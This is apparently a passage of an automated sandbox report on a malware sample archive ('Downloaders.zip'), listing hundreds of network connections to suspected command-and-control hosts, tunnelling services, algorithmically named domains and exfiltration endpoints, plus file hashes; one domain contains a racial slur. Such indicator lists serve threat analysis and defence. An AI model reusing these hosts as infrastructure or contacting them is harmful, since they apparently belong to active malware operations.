| US | 8.8.8.8:53 | 102.31.158.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | scure2glbcubnk.es | udp |
| US | 104.21.82.246:443 | scure2glbcubnk.es | tcp |
| US | 8.8.8.8:53 | 246.82.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.216.94.227:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.94.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| NL | 45.136.51.217:2222 | tcp | |
| US | 8.8.8.8:53 | a23uuu1.oss-cn-hongkong.aliyuncs.com | udp |
| FI | 95.217.25.228:443 | tcp | |
| HK | 47.79.66.210:80 | a23uuu1.oss-cn-hongkong.aliyuncs.com | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| RU | 83.239.55.170:40500 | udp | |
| US | 8.8.8.8:53 | 210.66.79.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.55.239.83.in-addr.arpa | udp |
| CN | 111.231.145.137:8888 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| GB | 88.221.135.11:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | exonic-hacks.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 88.221.135.11:443 | r.bing.com | udp |
| GB | 88.221.135.34:443 | th.bing.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| GB | 88.221.135.33:443 | th.bing.com | tcp |
| GB | 88.221.135.33:443 | th.bing.com | tcp |
| GB | 88.221.135.34:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 11.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.135.221.88.in-addr.arpa | udp |
| GB | 88.221.135.33:443 | th.bing.com | udp |
| GB | 88.221.135.34:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | applications-scenario.gl.at.ply.gg | udp |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| UZ | 90.156.164.28:40500 | udp | |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.72:443 | login.microsoftonline.com | tcp |
| RU | 91.240.118.204:8000 | 91.240.118.204 | tcp |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| CO | 181.131.217.244:30201 | navegacionseguracol24vip.org | tcp |
| FR | 89.156.24.108:1738 | tcp | |
| US | 8.8.8.8:53 | 28.164.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.118.240.91.in-addr.arpa | udp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.in.ngrok.io | udp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| RU | 94.198.55.181:4337 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 181.55.198.94.in-addr.arpa | udp |
| GB | 82.117.243.110:5173 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| DZ | 41.200.68.144:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | egorepetiiiosn.shop | udp |
| US | 8.8.8.8:53 | 144.68.200.41.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shelterryujxo.shop | udp |
| US | 8.8.8.8:53 | chequedxmznp.shop | udp |
| US | 8.8.8.8:53 | illnesmunxkza.shop | udp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | triallyforwhgh.shop | udp |
| US | 8.8.8.8:53 | shootydowtqosm.shop | udp |
| US | 8.8.8.8:53 | faceddullinhs.shop | udp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 8.8.8.8:53 | ammycanedpors.shop | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| HK | 47.238.55.14:5555 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| CO | 181.131.217.244:30201 | navegacionseguracol24vip.org | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | newstaticfreepoint24.ddns-ip.net | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| FI | 95.217.25.228:443 | tcp | |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| NL | 45.136.51.217:2222 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 123.156.64.82.in-addr.arpa | udp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | pentestfiles.s3.amazonaws.com | udp |
| US | 52.216.37.65:80 | pentestfiles.s3.amazonaws.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | faulteyotk.site | udp |
| US | 8.8.8.8:53 | seallysl.site | udp |
| US | 8.8.8.8:53 | opposezmny.site | udp |
| US | 8.8.8.8:53 | goalyfeastz.site | udp |
| US | 8.8.8.8:53 | contemteny.site | udp |
| US | 8.8.8.8:53 | dilemmadu.site | udp |
| US | 8.8.8.8:53 | 65.37.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.68.81.185.in-addr.arpa | udp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | authorisev.site | udp |
| US | 8.8.8.8:53 | servicedny.site | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 89.156.24.108:1738 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | uXPSmpVlnejowfEuOvrjEhYZ.uXPSmpVlnejowfEuOvrjEhYZ | udp |
| FR | 82.64.156.123:80 | tcp | |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| GB | 82.117.243.110:5173 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 148.163.102.170:4782 | tcp | |
| FI | 95.217.25.228:443 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| HK | 47.238.55.14:5555 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | ser.nrovn.xyz | udp |
| VN | 103.77.173.146:80 | ser.nrovn.xyz | tcp |
| FR | 82.64.156.123:80 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 8.8.8.8:53 | 146.173.77.103.in-addr.arpa | udp |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| NL | 45.136.51.217:2222 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 89.156.24.108:1738 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | status.mycompliancereports.com | udp |
| CA | 35.183.28.21:80 | status.mycompliancereports.com | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | 21.28.183.35.in-addr.arpa | udp |
| FR | 82.64.156.123:80 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | d2e5gvivzj4g90.cloudfront.net | udp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| FR | 18.164.55.74:443 | d2e5gvivzj4g90.cloudfront.net | tcp |
| VN | 103.77.173.146:7707 | ser.nrovn.xyz | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| US | 8.8.8.8:53 | 74.55.164.18.in-addr.arpa | udp |
| GB | 82.117.243.110:5173 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | condition-clearance.gl.at.ply.gg | udp |
| US | 147.185.221.19:7070 | condition-clearance.gl.at.ply.gg | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | home.sevjs17sr.top | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| IN | 3.6.231.193:15792 | 0.tcp.in.ngrok.io | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | lipis.github.io | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | stackpath.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 185.199.110.153:443 | lipis.github.io | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.18.10.207:443 | stackpath.bootstrapcdn.com | tcp |
| FR | 142.250.201.170:443 | ajax.googleapis.com | tcp |
| US | 162.159.130.234:443 | gateway.discord.gg | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 185.199.110.153:443 | lipis.github.io | tcp |
| US | 8.8.8.8:53 | 153.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.10.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.201.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.130.159.162.in-addr.arpa | udp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.148:80 | 185.81.68.148 | tcp |
| HK | 47.238.55.14:5555 | tcp | |
| FR | 194.59.30.220:1336 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.tcp.in.ngrok.io | udp |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | ajsinvestment.org | udp |
| NL | 45.136.51.217:2222 | tcp | |
| BG | 87.120.120.26:5959 | ajsinvestment.org | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| FR | 89.156.24.108:1738 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 82.64.156.123:80 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.134.91:80 | r11.o.lencr.org | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| US | 8.8.8.8:53 | 91.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| RU | 94.143.243.155:9001 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| RU | 212.109.16.228:21 | tcp | |
| RU | 212.109.2.201:8001 | 212.109.2.201 | tcp |
| RU | 217.77.58.161:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 217.77.48.229:80 | tcp | |
| RU | 217.77.62.113:8000 | tcp | |
| RU | 212.109.16.100:80 | tcp | |
| RU | 217.77.61.58:8291 | tcp | |
| RU | 185.9.80.66:9001 | 185.9.80.66 | tcp |
| RU | 217.77.48.179:22 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | 155.243.143.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.2.109.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.80.9.185.in-addr.arpa | udp |
| KR | 152.67.212.187:443 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| GB | 82.117.243.110:5173 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 147.185.221.19:7070 | condition-clearance.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| VN | 103.77.173.146:7707 | ser.nrovn.xyz | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 172.67.139.78:443 | drive-connect.cyou | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | 78.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 82.64.156.123:80 | tcp | |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 105.71.172.144.in-addr.arpa | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 144.172.71.105:1338 | 144.172.71.105 | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ftp.ywxww.net | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| CN | 60.191.208.187:820 | ftp.ywxww.net | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| HK | 47.238.55.14:5555 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| N/A | 192.168.31.99:4782 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.209.160.70:80 | tcp | |
| FR | 89.156.24.108:1738 | tcp | |
| NL | 45.136.51.217:2222 | tcp | |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 148.163.102.170:4782 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | josecaceresport.duckdns.org | udp |
| BG | 87.120.116.122:5959 | josecaceresport.duckdns.org | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 172.67.207.38:443 | immureprech.biz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.32.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 38.207.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.32.21.104.in-addr.arpa | udp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 147.185.221.19:7070 | condition-clearance.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| GB | 82.117.243.110:5173 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| VN | 103.77.173.146:8808 | ser.nrovn.xyz | tcp |
| US | 8.8.8.8:53 | download.emailorganizer.com | udp |
| NL | 190.2.142.115:80 | download.emailorganizer.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 82.64.156.123:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 147.185.221.21:53694 | applications-scenario.gl.at.ply.gg | tcp |
| BG | 87.120.116.122:5959 | josecaceresport.duckdns.org | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| IN | 35.154.189.194:15792 | 0.tcp.in.ngrok.io | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:30201 | newstaticfreepoint24.ddns-ip.net | tcp |
| FR | 82.64.156.123:80 | tcp | |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| RU | 185.209.160.70:80 | tcp |
Files
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders.zip
| MD5 | 94fe78dc42e3403d06477f995770733c |
| SHA1 | ea6ba4a14bab2a976d62ea7ddd4940ec90560586 |
| SHA256 | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267 |
| SHA512 | add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463.zip
| MD5 | 202786d1d9b71c375e6f940e6dd4828a |
| SHA1 | 7cad95faa33e92aceee3bcc809cd687bda650d74 |
| SHA256 | 45930e1ff487557dd242214c1e7d07294dbedfa7bc2cf712fae46d8d6b61de76 |
| SHA512 | de81012a38c1933a82cb39f1ac5261e7af8df80c8478ed540111fe84a6f150f0595889b0e087889894187559f61e1142d7e4971d05bceb737ed06f13726e7eae |
